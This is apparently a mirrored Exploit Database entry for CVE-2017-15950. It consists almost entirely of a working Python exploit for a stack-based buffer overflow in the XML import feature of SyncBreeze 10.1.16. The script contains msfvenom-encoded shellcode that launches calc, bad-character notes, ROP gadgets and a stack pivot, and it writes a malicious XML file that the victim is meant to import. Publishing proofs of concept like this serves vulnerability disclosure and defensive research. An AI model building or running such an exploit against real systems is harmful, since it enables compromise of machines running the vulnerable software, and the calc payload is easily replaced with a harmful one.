SyncBreeze 10.1.16 – XML Parsing Stack-based Buffer Overflow

• Exploit Database
• 14 阅读

• 作者： Filipe Oliveira
  日期： 2021-03-29
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49725/

• # Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
  # Date: 03/27/2021
  # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado- nnszs[at]protonmail.com
  # Vendor: https://www.syncbreeze.com/
  # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
  # Version: SyncBreeze v10.1.16 x86
  # Tested on: Windows 10 x64 (19042.867)
  # CVE: CVE-2017-15950
  
  Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. 
  
  # -*- coding: utf-8 -*-
  
  import struct
  
  # badchars
  #\x00\x0a\x0d\x20\x27
  #\x81\x82\x83\x84\x85\x86\x87\x88
  #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90
  #\x91\x92\x93\x94\x95\x96\x97\x98
  #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0
  #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8
  #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0
  #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8
  #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0
  #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8
  #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0
  #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8
  #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0
  #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8
  #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0
  #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8
  #\xF9\xFA\xFB\xFC\xFD\xFE\xFF
  
  # Shellcode payload size: 432 bytes
  # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python
  
  shellcode =b""
  shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
  shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
  shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
  shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"
  shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"
  shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"
  shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"
  shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"
  shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"
  shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"
  shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"
  shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"
  shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"
  shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"
  shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"
  shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"
  shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"
  shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"
  shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"
  shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"
  shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"
  shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"
  shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"
  shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"
  shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"
  shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"
  shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"
  shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"
  shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"
  shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"
  shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"
  shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"
  shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"
  shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"
  shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"
  shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"
  shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"
  shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"
  shellcode += b"\x30\x41\x41"
  
  
  # padding to crash buffer
  basura = struct.pack('<L', 0x41414141) * 390
  
  # gadgets to move payload pointer into EAX
  GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP
  GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX
  
  # padding to reach buffer address stored in ebp
  basura2 = struct.pack('<L', 0x41414141) * 56
  
  # padding for stack pivot
  
  padding = struct.pack('<L', 0x41414141) * 4
  padding2 = struct.pack('<L', 0x41414141) * 20
  
  # stack pivot to reach an area with more space for gadgets on the stack
  # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret
  
  pivot = struct.pack('<L', 0x6506491c)
  
  # final payload
  
  fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode
  
  
  # write payload to xml file
  
  payload = open("xplSyncBreeze.xml", "wb")
  payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))
  
  payload.write("<sync name='".encode('utf-8'))
  payload.write(fruta)
  payload.write("'>\n</sync>\n".encode('utf-8'))
  
  payload.close()